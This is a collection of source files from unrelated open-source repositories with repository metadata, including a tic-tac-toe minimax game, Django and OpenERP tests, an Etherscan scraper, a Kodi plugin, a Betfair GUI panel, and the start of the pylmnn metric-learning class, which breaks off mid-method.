ShikherVerma/tic-tac-toe | ttt.py | 1 | 5016 | '''
Project - Tic Tic Tac Toe
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
'''
import sys#
import time#for wait of 1 seconds
import os
import random#for adding randomness into program so that the computer's move is not always the same
#display function start
def disp():
for x in range(3):
for y in range(3):
if a[x][y] == -100:
print "_ ",
elif a[x][y] == 0 :
print "O ",
else :
print "X ",
print "\n"
#display function end
#check function
def check():
for x in range(3):
sumrow = a[x][0] + a[x][1] + a[x][2]
if sumrow == 3:
return -100
elif sumrow == 0:
return 100
for x in range(3):
sumcol = a[0][x] + a[1][x] + a[2][x]
if sumcol == 3:
return -100
elif sumcol == 0:
return 100
sumdiag1 = a[0][0] + a[1][1] + a[2][2]
if sumdiag1 == 3:
return -100
elif sumdiag1 == 0:
return 100
sumdiag2 = a[0][2] + a[1][1] + a[2][0]
if sumdiag2 == 3:
return -100
elif sumdiag2 == 0:
return 100
flag = 0 #flag is for checking if any move is possible
for x in range(3):
for y in range(3):
if a[x][y] == -100:
flag = 1
return
#code can be optimized here by removing flag and playing with the return statement, if loop exits the nested for then no a[][]=-100 so return 0
if flag == 0:
return 0
#check funtion end
#input
def user_move():
x = int(input())
y = int(input())
if x>2 or x < 0 or y>2 or y<0 or a[x][y] != -100 :
print "illegal move"
user_move()
else :
a[x][y] = 1
#input close
#minmax start
def minmax(game,depth,move_whose):
if check() == 100:
return 100 - depth,0
if check() == -100:
return depth - 100,0
if check() == 0:
return 0,0
maximum =-10000
minimum = 10000
trick=0
trickmaxmove=0
tricksumminmove=0
trickmat = [[-10000 for x in range(3)] for x in range(3)]
for x in range(3):
for y in range(3):
if game[x][y] == -100:
if move_whose:
game[x][y] = 1
else:
game[x][y] = 0
temp,trick = minmax(game,depth+1,not(move_whose))
trickmat[x][y]=trick
if (temp==100-depth-1) and not(move_whose):#dont evaluate further if move is of computer and there is an instant win,
#THIS ALSO REDUCES THE TRICK CASES WHERE WE INSTEAD OF CLAIMING INSTANT WIN , TRY TO MAKE A TRICK
game[x][y]=-100
return temp,trick
#code can be optimized by moving these conditions into the if below
if (temp==100-depth-2)and (move_whose):
trick+=1
disp()
print "\n\n"
time.sleep(1)
if move_whose:
tricksumminmove+=trick
if minimum > temp:
minimum = temp
else:
if maximum < temp:
maximum = temp
trickmaxmove=trick
game[x][y] = -100
if depth==0:
print trickmat
if move_whose:
return minimum,tricksumminmove
else:
if tricksumminmove!=0:
print trickforminmove
return maximum,trickmaxmove
#next move
def ttt_move():
score = [[-10000 for x in range(3)] for x in range(3)]
trick = [[-10000 for x in range(3)] for x in range(3)]
for x in range(3):
for y in range(3):
if a[x][y] == -100:
a[x][y] = 0
score[x][y],trick[x][y] = minmax(a,0,True)#round(random.random(),2)
score[x][y]=score[x][y]+trick[x][y]#random() adds random values from 0 to 1 so that there is some randomness in the program
#depth = 0 for 1st time and 3rd parameter is whose move it is False == computer and True == user
a[x][y] = -100
maximum = -10000
bestx = 1
besty = 1
for x in range(3):
for y in range(3):
if score[x][y] > maximum:
maximum = score[x][y]
bestx = x
besty = y
a[bestx][besty] = 0
print score
print trick
#next move end
#initial choice
def initial_choice():
ans = raw_input("wanna play first?")
if ans == "n":
ttt_move()
disp()
elif ans == "y":
return
elif ans !="y":
print "type y or n"
initial_choice()
#initial_choice end
#int main
'''a trick is defined as a position where for every move of the opponent the pc wins ,
if there is no sure short win already
and if opponent plays a little non perfect by choosing the second least tree'''
a = [[-100 for x in range(3)] for x in range(3)]
initial_choice()
while True :
user_move()
disp()
if check() == -100:
sys.exit("YOU WON!!!")
elif check() == 0:
sys.exit("IS THIS THE BEST YOU CAN DO???!!!")
print "thinking........"
time.sleep(1)
os.system('clear')
ttt_move()
disp()
if check() == 100:
sys.exit("YOU LOSE")
elif check() == 0:
sys.exit("IS THIS THE BEST YOU CAN DO???!!!")
#int main end
| gpl-3.0 | 7,665,694,044,367,622,000 | 24.591837 | 144 | 0.636563 | false | 2.760594 | false | false | false |
rvalyi/openerp-pt_br | tests_others/test_create_tax_include.py | 2 | 1060 |
def test_create_tax_include(oerp):
tax_code_obj = oerp.pool.get('account.tax.code')
tax_code_id = tax_code_obj.create(oerp.cr, 1, {
'name': 'ISS 2%',
'company_id': 1,
'sign': 1,
'tax_discount': 'TRUE',
'tax_include': 'TRUE',
'notprintable': 'TRUE',
'domain': 'iss'
})
assert tax_code_obj.browse(oerp.cr, 1, [tax_code_id])[0].id == tax_code_id
tax_obj = oerp.pool.get('account.tax')
tax_id = tax_obj.create(oerp.cr, 1, {
'sequence': '1',
'type_tax_use': 'all',
'applicable_type': 'true',
'company_id': 1,
'name': 'ISS 2%',
'amount': 0.0200,
'type': 'percent',
'tax_code_id': tax_code_id,
'base_reduction': 0.0000,
'amount_mva': 0.0000,
'price_include': 'FALSE',
'tax_discount': 'TRUE',
'tax_add': 'FALSE',
'tax_include': 'TRUE',
'tax_retain': 'FALSE',
'domain': 'iss',
})
assert tax_obj.browse(oerp.cr, 1, [tax_id])[0].id == tax_id
| agpl-3.0 | 2,861,934,955,532,070,000 | 27.648649 | 78 | 0.490566 | false | 2.888283 | false | false | false |
devs1991/test_edx_docmode | venv/lib/python2.7/site-packages/django_openid_auth/tests/test_models.py | 4 | 3239 | # django-openid-auth - OpenID integration for django.contrib.auth
#
# Copyright (C) 2013 Canonical Ltd.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
from __future__ import unicode_literals
from django.contrib.auth.models import User
from django.test import TestCase
from django_openid_auth.models import (
Permission,
UserOpenID,
)
class UserOpenIDModelTestCase(TestCase):
def test_create_useropenid(self):
user = User.objects.create_user('someuser', '[email protected]',
password=None)
user_openid, created = UserOpenID.objects.get_or_create(
user=user,
claimed_id='http://example.com/existing_identity',
display_id='http://example.com/existing_identity')
self.assertEqual('someuser', user_openid.user.username)
self.assertEqual(
user_openid.claimed_id, 'http://example.com/existing_identity')
self.assertEqual(
user_openid.display_id, 'http://example.com/existing_identity')
self.assertFalse(
User.objects.get(username='someuser').has_perm(
'django_openid_auth.account_verified'))
def test_delete_verified_useropenid(self):
user = User.objects.create_user('someuser', '[email protected]',
password=None)
user_openid, created = UserOpenID.objects.get_or_create(
user=user,
claimed_id='http://example.com/existing_identity',
display_id='http://example.com/existing_identity')
permission = Permission.objects.get(codename='account_verified')
user.user_permissions.add(permission)
self.assertTrue(
User.objects.get(username='someuser').has_perm(
'django_openid_auth.account_verified'))
user_openid.delete()
self.assertFalse(
User.objects.get(username='someuser').has_perm(
'django_openid_auth.account_verified'))
| agpl-3.0 | -6,921,360,719,145,145,000 | 42.77027 | 75 | 0.692806 | false | 4.341823 | true | false | false |
yanbober/SmallReptileTraining | AndroidSpider/Spider_ethsacn.py | 1 | 1900 | #-*-coding:utf-8 -*-
# 将ETHSCAN记录保存的脚本
import urllib.request as urllib2
from urllib import request
import random
from bs4 import BeautifulSoup
'''
# user_agent是爬虫与反爬虫斗争的第一步
ua_headers = {
'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0',
}'''
# 用于模拟http头的User-agent
ua_list = [
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv2.0.1) Gecko/20100101 Firefox/4.0.1",
"Mozilla/5.0 (Windows NT 6.1; rv2.0.1) Gecko/20100101 Firefox/4.0.1",
"Opera/9.80 (Macintosh; Intel Mac OS X 10.6.8; U; en) Presto/2.8.131 Version/11.11",
"Opera/9.80 (Windows NT 6.1; U; en) Presto/2.8.131 Version/11.11",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11"
]
user_agent=random.choice(ua_list)
#要查询的以太地址
address="0xBD9d6e7489A7b450937fA7ECbAbd71Be819beE3D"
page_number_start=0
page_count=10
for ii in range(page_count):
page_number_start=page_number_start+1
page_number=str(page_number_start)
url="https://etherscan.io/txs?a="+address+"&p="+page_number
# 通过Request()方法构造一个请求对象
request1=urllib2.Request(url=url)
# 把头添加进去
request1.add_header('User-Agent',user_agent)
# 向指定的url地址发送请求,并返回服务器响应的类文件对象
response=urllib2.urlopen(request1)
# 服务器返回的类文件对象支持python文件对象的操作方法
#html=response.read()
#print(html.decode('utf-8'))
soup=BeautifulSoup(response,"html.parser")
k=0
for i in soup.find_all('td',limit=400):
k=k+1
m=k%8
if m==0:
br='\n'
else:
br=''
tbody=i.get_text()
data=str(tbody.encode('gbk','ignore'))+","+br
with open('test11.csv', 'a') as f:
f.write(data)
print("已完成:",str(page_number)+"/"+str(page_count)) | mit | -6,785,151,779,548,744,000 | 26.786885 | 128 | 0.68595 | false | 2.060827 | false | false | false |
Basis/webargs | examples/bottle_example.py | 1 | 1822 | """A simple number and datetime addition JSON API.
Run the app:
$ python examples/bottle_example.py
Try the following with httpie (a cURL-like utility, http://httpie.org):
$ pip install httpie
$ http GET :5001/
$ http GET :5001/ name==Ada
$ http POST :5001/add x=40 y=2
$ http POST :5001/dateadd value=1973-04-10 addend=63
$ http POST :5001/dateadd value=2014-10-23 addend=525600 unit=minutes
"""
import datetime as dt
from bottle import route, run, error, response
from webargs import fields, validate
from webargs.bottleparser import use_args, use_kwargs
hello_args = {
'name': fields.Str(missing='Friend')
}
@route('/', method='GET')
@use_args(hello_args)
def index(args):
"""A welcome page.
"""
return {'message': 'Welcome, {}!'.format(args['name'])}
add_args = {
'x': fields.Float(required=True),
'y': fields.Float(required=True),
}
@route('/add', method='POST')
@use_kwargs(add_args)
def add(x, y):
"""An addition endpoint."""
return {'result': x + y}
dateadd_args = {
'value': fields.DateTime(required=False),
'addend': fields.Int(required=True, validate=validate.Range(min=1)),
'unit': fields.Str(missing='days', validate=validate.OneOf(['minutes', 'days']))
}
@route('/dateadd', method='POST')
@use_kwargs(dateadd_args)
def dateadd(value, addend, unit):
"""A datetime adder endpoint."""
value = value or dt.datetime.utcnow()
if unit == 'minutes':
delta = dt.timedelta(minutes=addend)
else:
delta = dt.timedelta(days=addend)
result = value + delta
return {'result': result.isoformat()}
# Return validation errors as JSON
@error(422)
def error422(err):
response.content_type = 'application/json'
return err.body
if __name__ == '__main__':
run(port=5001, reloader=True, debug=True)
| mit | 6,806,274,260,072,507,000 | 26.606061 | 84 | 0.656422 | false | 3.219081 | false | false | false |
s0faking/plugin.video.puls4 | resources/lib/base.py | 1 | 3786 | #!/usr/bin/python
# -*- coding: utf-8 -*-
import xbmc
import xbmcaddon
import xbmcgui
import xbmcplugin
from .app_common import log, defaultbanner, addon_handle, addon_url, translate, showNotification, kodiVersion, installAddon
from .utils import cleanText, encodeUrl
def get_InputStreamHelper(drm):
streamHelper = None
if kodiVersion >= 17:
try:
import inputstreamhelper
except:
installAddon('script.module.inputstreamhelper')
return streamHelper
try:
streamHelper = inputstreamhelper.Helper('mpd', drm=drm)
except Exception as ex:
if ex == 'UnsupportedDRMScheme' and drm == 'com.microsoft.playready':
streamHelper = inputstreamhelper.Helper('mpd', drm=None)
pass
else:
showNotification(translate(30018).format(drm), notificationType='ERROR')
if streamHelper and not streamHelper._has_inputstream():
# install inputstream
xbmc.executebuiltin(
'InstallAddon(' + streamHelper.inputstream_addon + ')', True)
return streamHelper
def addElement(title, fanart, icon, description, link, mode, channel='', duration=None, date='', isFolder=True,
subtitles=None, width=768, height=432, showID=None):
if fanart == '':
fanart = defaultbanner
if icon == '':
icon = defaultbanner
if description == '':
description = (translate(30004))
description = cleanText(description)
title = cleanText(title)
list_item = xbmcgui.ListItem(title)
list_item.setInfo('video', {'title': title,
'Tvshowtitle': title,
'Sorttitle': title,
'Plot': description,
'Plotoutline': description,
'Aired': date,
'Studio': channel})
list_item.setArt({'thumb': icon, 'icon': icon, 'fanart': fanart})
list_item.setProperty('IsPlayable', str(not isFolder))
if not duration:
duration = 0
if not isFolder:
list_item.setInfo(type='Video', infoLabels={'mediatype': 'video'})
list_item.addStreamInfo('video', {'codec': 'h264', 'duration': int(
duration), 'aspect': 1.78, 'width': width, 'height': height})
list_item.addStreamInfo(
'audio', {'codec': 'aac', 'language': 'de', 'channels': 2})
if subtitles != None:
list_item.addStreamInfo('subtitle', {'language': 'de'})
parameters = {'link': link, 'mode': mode, 'showID': showID}
url = addon_url + '?' + encodeUrl(parameters)
xbmcplugin.addDirectoryItem(addon_handle, url, list_item, isFolder)
del list_item
def addItemsToKodi(sort):
xbmcplugin.setPluginCategory(addon_handle, 'Show')
xbmcplugin.setContent(addon_handle, 'videos')
if sort:
xbmcplugin.addSortMethod(addon_handle, xbmcplugin.SORT_METHOD_VIDEO_TITLE)
xbmcplugin.endOfDirectory(addon_handle)
log('callback done')
def play_video(url):
play_item = xbmcgui.ListItem(path=url)
xbmcplugin.setResolvedUrl(addon_handle, True, listitem=play_item)
del play_item
log('callback done')
def play_liveStream(path, addon, drm, tkn):
play_item = xbmcgui.ListItem(path=path)
play_item.setProperty('inputstreamaddon', addon)
play_item.setProperty('inputstream.adaptive.manifest_type', 'mpd')
play_item.setProperty('inputstream.adaptive.license_type', drm)
play_item.setProperty(
'inputstream.adaptive.manifest_update_parameter', 'full')
play_item.setProperty('inputstream.adaptive.license_key', tkn)
xbmcplugin.setResolvedUrl(addon_handle, True, listitem=play_item)
del play_item
log('callback done')
| gpl-2.0 | 7,925,485,877,021,984,000 | 33.733945 | 123 | 0.630481 | false | 3.927386 | false | false | false |
m4sterm1nd/python | betfair/AlgoView/algomanagementpanel.py | 1 | 5683 | import wx
from algoloader import AlgorithmLoader
from wx.lib.pubsub import Publisher as pub
from publisherconstants import *
# Event IDs
ID_LOAD_ALGOS = wx.NewId()
ID_LOAD_MARKETS = wx.NewId()
class AlgoManagementPanel(wx.Panel):
def __init__(self, parent, session):
super(AlgoManagementPanel, self).__init__(parent)
self.session = session
self.InitUI()
# Load available trading algorithms
self.LoadAlgos()
self.LoadMarkets()
def InitUI(self):
font = wx.SystemSettings_GetFont(wx.SYS_SYSTEM_FONT)
font.SetPointSize(9)
# Refresh image for adding to refresh buttons
bitmapRefresh = wx.Bitmap('img/refresh.png')
image = wx.ImageFromBitmap(bitmapRefresh)
image = image.Scale(16, 16, wx.IMAGE_QUALITY_HIGH)
bitmapRefresh = wx.BitmapFromImage(image)
vbox1 = wx.BoxSizer(wx.VERTICAL)
hbox1 = wx.BoxSizer(wx.HORIZONTAL)
st1 = wx.StaticText(self, label='Available Algorithms')
st1.SetFont(font)
hbox1.Add(st1)
btnRefreshAlgos = wx.BitmapButton(self, ID_LOAD_ALGOS, bitmapRefresh)
hbox1.Add(btnRefreshAlgos, flag=wx.RIGHT | wx.TOP)
vbox1.Add(hbox1, flag=wx.LEFT | wx.TOP, border=10)
vbox1.Add((-1, 10))
hbox2 = wx.BoxSizer(wx.HORIZONTAL)
self.lstAlgos = wx.ListBox(self, -1)
hbox2.Add(self.lstAlgos, proportion=1, flag=wx.EXPAND)
vbox1.Add(hbox2, proportion=1, flag=wx.LEFT | wx.RIGHT | wx.EXPAND, border=10)
vbox1.Add((-1, 10))
hbox3 = wx.BoxSizer(wx.HORIZONTAL)
st2 = wx.StaticText(self, label='Available ' + self.session.sessionType + ' Markets')
st2.SetFont(font)
hbox3.Add(st2)
btnRefreshMarkets = wx.BitmapButton(self, ID_LOAD_MARKETS, bitmapRefresh)
hbox3.Add(btnRefreshMarkets, flag=wx.RIGHT | wx.TOP)
vbox1.Add(hbox3, flag=wx.LEFT, border=10)
vbox1.Add((-1, 10))
hbox4 = wx.BoxSizer(wx.HORIZONTAL)
self.treeMarkets = wx.TreeCtrl(self, 1, wx.DefaultPosition, (-1, -1), wx.TR_HAS_BUTTONS | wx.TR_MULTIPLE)
hbox4.Add(self.treeMarkets, proportion=1, flag=wx.EXPAND)
vbox1.Add(hbox4, proportion=1, flag=wx.LEFT | wx.RIGHT | wx.EXPAND, border=10)
self.SetSizer(vbox1)
# Event handlers
self.Bind(wx.EVT_BUTTON, self.OnLoadAlgos, id=ID_LOAD_ALGOS)
self.Bind(wx.EVT_BUTTON, self.OnLoadMarkets, id=ID_LOAD_MARKETS)
self.Bind(wx.EVT_TREE_ITEM_ACTIVATED, self.OnMarketSelected, self.treeMarkets)
def OnLoadAlgos(self, event):
self.LoadAlgos()
def OnLoadMarkets(self, event):
self.LoadMarkets()
def LoadAlgos(self):
pub.sendMessage(SUBJECT_STATUSBAR, "Loading trading algorithms...")
self.algos = AlgorithmLoader().loadAlgorithms()
self.lstAlgos.Clear()
for algo in self.algos:
self.lstAlgos.Append(algo.name + " - " + algo.description)
pub.sendMessage(SUBJECT_STATUSBAR, "Found " + str(len(self.algos)) + " available algorithms")
return True
def LoadMarkets(self):
self.markets = self.session.GetAvailableMarkets()
if self.markets == None:
return False
self.treeMarkets.DeleteAllItems()
root = self.treeMarkets.AddRoot('Markets')
# Add all markets to the tree
items = {}
for market in self.markets:
path = ''
parent = root
# Iterate over the market path
for item in market.menuPathParts:
path = path + item
if path in items:
parent = items[path]
continue
# Add this node if it doesn't exist
parent = items[path] = self.treeMarkets.AppendItem(parent, item)
# After all of the parent nodes are present, at the market type
items[path + market.marketName] = self.treeMarkets.AppendItem(items[path], market.marketName)
# Attach the market information to the tree object for extraction later
self.treeMarkets.SetPyData(items[path + market.marketName], market)
self.treeMarkets.Expand(root)
pub.sendMessage(SUBJECT_STATUSBAR,
'Found ' + str(len(self.markets)) + ' available ' + self.session.sessionType + ' markets')
return True
def OnMarketSelected(self, event):
selected = event.GetItem()
if self.treeMarkets.GetChildrenCount(selected) == 0:
mId = self.treeMarkets.GetPyData(selected).marketId
wx.MessageBox(str(self.treeMarkets.GetPyData(selected)), 'AlgoView')
#print self.bfClient.getMarket(bfpy.ExchangeUK, marketId=mId)
print self.session.GetMarketData(marketId=mId)
##print self.bfClient.getMarketPricesCompressed(bfpy.ExchangeUK, marketId=mId)
#print self.bfClient.getMUBets(bfpy.ExchangeUK, marketId=mId, betStatus='MU')
##print self.bfClient.getMUBetsLite(bfpy.ExchangeUK, marketId=mId, betStatus='MU')
#print self.bfClient.getMarketProfitAndLoss(bfpy.ExchangeUK, marketId=mId)
#print self.bfClient.getCompleteMarketPricesCompressed(bfpy.ExchangeUK, marketId=mId)
#print self.bfClient.getDetailAvailableMarketDepth(bfpy.ExchangeUK, marketId=mId, selectionId=55190)
##print self.bfClient.getMarketTradedVolume(bfpy.ExchangeUK, marketId=mId, selectionId=55190)
#print self.bfClient.getMarketTradedVolumeCompressed(bfpy.ExchangeUK, marketId=mId)
# TODO(coreyf): Show market information in GUI
else:
event.Skip()
| gpl-2.0 | -1,328,546,920,181,080,300 | 39.021127 | 113 | 0.643146 | false | 3.549656 | false | false | false |
mdeutsch86/stocks | portfolio.py | 1 | 2459 | from asset import Asset
from stock import Stock
from savingsBook import SavingsBook
class Portfolio(object):
def __init__(self):
"""
You should first pay_in, otherwise you can not buy anything
"""
self.cash = 0.
self.stocks = {}
self.savingBooks = {}
self.others = 0.
self.performance = self.calc_performance()
self.asset_allocation = {}
def pay_in(self, amount):
self.cash += float(amount)
def calc_performance(self):
pass
def calc_asset_allocation(self):
cash = self.cash
stocks =0
savingBooks = 0
def calc_howMuch(self, price, fees):
"""
calculates how much stocks are possible to buy depending
on the cash you have on your account
"""
return (self.cash - fees)//price
def buyStock(self, stock_name, stock_price, stock_amount, stock_fee):
stock_name = stock_name.upper()
if self.cash > stock_price*stock_amount-stock_fee:
self.cash -= stock_price*stock_amount-stock_fee
if stock_name in self.stocks.keys():
self.stocks[stock_name].update_stock(stock_price, stock_amount, stock_fee)
else:
self.stocks.update({stock_name: Stock(stock_name, stock_price, stock_amount, stock_fee)})
else:
print("You do not have enough money to buy that much stocks!!!")
def deposit_on_SavingsBook(self, bookName, amount):
bookName = bookName.upper()
if bookName in self.savingBooks.keys():
self.savingBooks[bookName].update_savingsBook(amount)
else:
self.savingBooks.update({bookName: SavingsBook(bookName, amount)})
def __str__(self):
if self.cash == 0.:
data = ''
else:
data = 'Cash: {}\n'.format(self.cash)
for key, value in self.stocks.iteritems():
data+= str(value)+'\n'
return data
if __name__ =='__main__':
import random
stockprice = [27.69,28.30,27.78,28.38,27.86,27.13,28.26,28.82,28.18,28.31]
fee = 5.0
p=Portfolio()
p.pay_in(100)
p.buyStock('KO', 27.96, 3, fee)
for i in range(10):
price = random.choice(stockprice)
p.pay_in(100)
amount = p.calc_howMuch(price,fee)
if price < p.stocks['KO'].price:
p.buyStock('KO', price, amount, fee)
print('bought')
print(p)
| mit | -3,954,065,350,930,761,000 | 29.358025 | 105 | 0.575031 | false | 3.517883 | false | false | false |
johny-c/pylmnn | pylmnn/lmnn.py | 1 | 50724 | # coding: utf-8
"""
Large Margin Nearest Neighbor Classification
"""
# Author: John Chiotellis <[email protected]>
# License: BSD 3 clause
from __future__ import print_function
from warnings import warn
import sys
import time
import numpy as np
from scipy.optimize import minimize
from scipy.sparse import csr_matrix, csc_matrix, coo_matrix
from sklearn.base import BaseEstimator, TransformerMixin
from sklearn.pipeline import Pipeline
from sklearn.neighbors import NearestNeighbors, KNeighborsClassifier
from sklearn.decomposition import PCA
from sklearn.utils import gen_batches
from sklearn.utils.extmath import row_norms, safe_sparse_dot
from sklearn.utils.random import check_random_state
from sklearn.utils.multiclass import check_classification_targets
from sklearn.utils.validation import check_is_fitted, check_array, check_X_y
from sklearn.exceptions import ConvergenceWarning
try:
from six import integer_types, string_types
except ImportError:
try:
from sklearn.externals.six import integer_types, string_types
except ImportError:
raise ImportError("The module six must be installed or the version of scikit-learn version must be < 0.23")
from .utils import _euclidean_distances_without_checks
class LargeMarginNearestNeighbor(BaseEstimator, TransformerMixin):
"""Distance metric learning for large margin classification.
Parameters
----------
n_neighbors : int, optional (default=3)
Number of neighbors to use as target neighbors for each sample.
n_components : int, optional (default=None)
Preferred dimensionality of the embedding.
If None it is inferred from ``init``.
init : string or numpy array, optional (default='pca')
Initialization of the linear transformation. Possible options are
'pca', 'identity' and a numpy array of shape (n_features_a,
n_features_b).
pca:
``n_components`` many principal components of the inputs passed
to :meth:`fit` will be used to initialize the transformation.
identity:
If ``n_components`` is strictly smaller than the
dimensionality of the inputs passed to :meth:`fit`, the identity
matrix will be truncated to the first ``n_components`` rows.
numpy array:
n_features_b must match the dimensionality of the inputs passed to
:meth:`fit` and n_features_a must be less than or equal to that.
If ``n_components`` is not None, n_features_a must match it.
warm_start : bool, optional, (default=False)
If True and :meth:`fit` has been called before, the solution of the
previous call to :meth:`fit` is used as the initial linear
transformation (``n_components`` and ``init`` will be ignored).
max_impostors : int, optional (default=500000)
Maximum number of impostors to consider per iteration. In the worst
case this will allow ``max_impostors * n_neighbors`` constraints to be
active.
neighbors_params : dict, optional (default=None)
Parameters to pass to a :class:`neighbors.NearestNeighbors` instance -
apart from ``n_neighbors`` - that will be used to select the target
neighbors.
weight_push_loss : float, optional (default=0.5)
A float in (0, 1], weighting the push loss. This is parameter ``μ``
in the journal paper (See references below). In practice, the objective
function will be normalized so that the push loss has weight 1 and
hence the pull loss has weight ``(1 - μ)/μ``.
impostor_store : str ['auto'|'list'|'sparse'], optional
list :
Three lists will be used to store the indices of reference
samples, the indices of their impostors and the (squared)
distances between the (sample, impostor) pairs.
sparse :
A sparse indicator matrix will be used to store the (sample,
impostor) pairs. The (squared) distances to the impostors will be
computed twice (once to determine the impostors and once to be
stored), but this option tends to be faster than 'list' as the
size of the data set increases.
auto :
Will attempt to decide the most appropriate choice of data
structure based on the values passed to :meth:`fit`.
max_iter : int, optional (default=50)
Maximum number of iterations in the optimization.
tol : float, optional (default=1e-5)
Convergence tolerance for the optimization.
callback : callable, optional (default=None)
If not None, this function is called after every iteration of the
optimizer, taking as arguments the current solution (transformation)
and the number of iterations. This might be useful in case one wants
to examine or store the transformation found after each iteration.
store_opt_result : bool, optional (default=False)
If True, the :class:`scipy.optimize.OptimizeResult` object returned by
:meth:`minimize` of `scipy.optimize` will be stored as attribute
``opt_result_``.
verbose : int, optional (default=0)
If 0, no progress messages will be printed.
If 1, progress messages will be printed to stdout.
If > 1, progress messages will be printed and the ``iprint``
parameter of :meth:`_minimize_lbfgsb` of `scipy.optimize` will be set
to ``verbose - 2``.
random_state : int or numpy.RandomState or None, optional (default=None)
A pseudo random number generator object or a seed for it if int.
n_jobs : int, optional (default=1)
The number of parallel jobs to run for neighbors search.
If ``-1``, then the number of jobs is set to the number of CPU cores.
Doesn't affect :meth:`fit` method.
Attributes
----------
components_ : array, shape (n_components, n_features)
The linear transformation learned during fitting.
n_neighbors_ : int
The provided ``n_neighbors`` is decreased if it is greater than or
equal to min(number of elements in each class).
n_iter_ : int
Counts the number of iterations performed by the optimizer.
opt_result_ : scipy.optimize.OptimizeResult (optional)
A dictionary of information representing the optimization result.
This is stored only if ``store_opt_result`` is True. It contains the
following attributes:
x : ndarray
The solution of the optimization.
success : bool
Whether or not the optimizer exited successfully.
status : int
Termination status of the optimizer.
message : str
Description of the cause of the termination.
fun, jac : ndarray
Values of objective function and its Jacobian.
hess_inv : scipy.sparse.linalg.LinearOperator
the product of a vector with the approximate inverse of the
Hessian of the objective function..
nfev : int
Number of evaluations of the objective function..
nit : int
Number of iterations performed by the optimizer.
Examples
--------
>>> from pylmnn import LargeMarginNearestNeighbor
>>> from sklearn.neighbors import KNeighborsClassifier
>>> from sklearn.datasets import load_iris
>>> from sklearn.model_selection import train_test_split
>>> X, y = load_iris(return_X_y=True)
>>> X_train, X_test, y_train, y_test = train_test_split(X, y,
... stratify=y, test_size=0.7, random_state=42)
>>> lmnn = LargeMarginNearestNeighbor(n_neighbors=3, random_state=42)
>>> lmnn.fit(X_train, y_train) # doctest: +ELLIPSIS
LargeMarginNearestNeighbor(...)
>>> # Fit and evaluate a simple nearest neighbor classifier for comparison
>>> knn = KNeighborsClassifier(n_neighbors=3)
>>> knn.fit(X_train, y_train) # doctest: +ELLIPSIS
KNeighborsClassifier(...)
>>> print(knn.score(X_test, y_test))
0.933333333333
>>> # Now fit on the data transformed by the learned transformation
>>> knn.fit(lmnn.transform(X_train), y_train) # doctest: +ELLIPSIS
KNeighborsClassifier(...)
>>> print(knn.score(lmnn.transform(X_test), y_test))
0.971428571429
.. warning::
Exact floating-point reproducibility is generally not guaranteed
(unless special care is taken with library and compiler options). As
a consequence, the transformations computed in 2 identical runs of
LargeMarginNearestNeighbor can differ from each other. This can
happen even before the optimizer is called if initialization with
PCA is used (init='pca').
References
----------
.. [1] Weinberger, Kilian Q., and Lawrence K. Saul.
"Distance Metric Learning for Large Margin Nearest Neighbor
Classification."
Journal of Machine Learning Research, Vol. 10, Feb. 2009,
pp. 207-244.
http://jmlr.csail.mit.edu/papers/volume10/weinberger09a/weinberger09a.pdf
.. [2] Wikipedia entry on Large Margin Nearest Neighbor
https://en.wikipedia.org/wiki/Large_margin_nearest_neighbor
"""
def __init__(self, n_neighbors=3, n_components=None, init='pca',
warm_start=False, max_impostors=500000, neighbors_params=None,
weight_push_loss=0.5, impostor_store='auto', max_iter=50,
tol=1e-5, callback=None, store_opt_result=False, verbose=0,
random_state=None, n_jobs=1):
# Parameters
self.n_neighbors = n_neighbors
self.n_components = n_components
self.init = init
self.warm_start = warm_start
self.max_impostors = max_impostors
self.neighbors_params = neighbors_params
self.weight_push_loss = weight_push_loss
self.impostor_store = impostor_store
self.max_iter = max_iter
self.tol = tol
self.callback = callback
self.store_opt_result = store_opt_result
self.verbose = verbose
self.random_state = random_state
self.n_jobs = n_jobs
def fit(self, X, y):
"""Fit the model according to the given training data.
Parameters
----------
X : array-like, shape (n_samples, n_features)
The training samples.
y : array-like, shape (n_samples,)
The corresponding training labels.
Returns
-------
self : object
returns a trained LargeMarginNearestNeighbor model.
"""
# Validate the inputs
X, y = check_X_y(X, y, ensure_min_samples=2)
check_classification_targets(y)
# Check that the inputs are consistent with the parameters
X_valid, y_valid, classes, init = self._validate_params(X, y)
# Initialize the random generator
self.random_state_ = check_random_state(self.random_state)
# Measure the total training time
t_train = time.time()
# Initialize the linear transformation
transformation = self._initialize(X_valid, init)
# Find the target neighbors
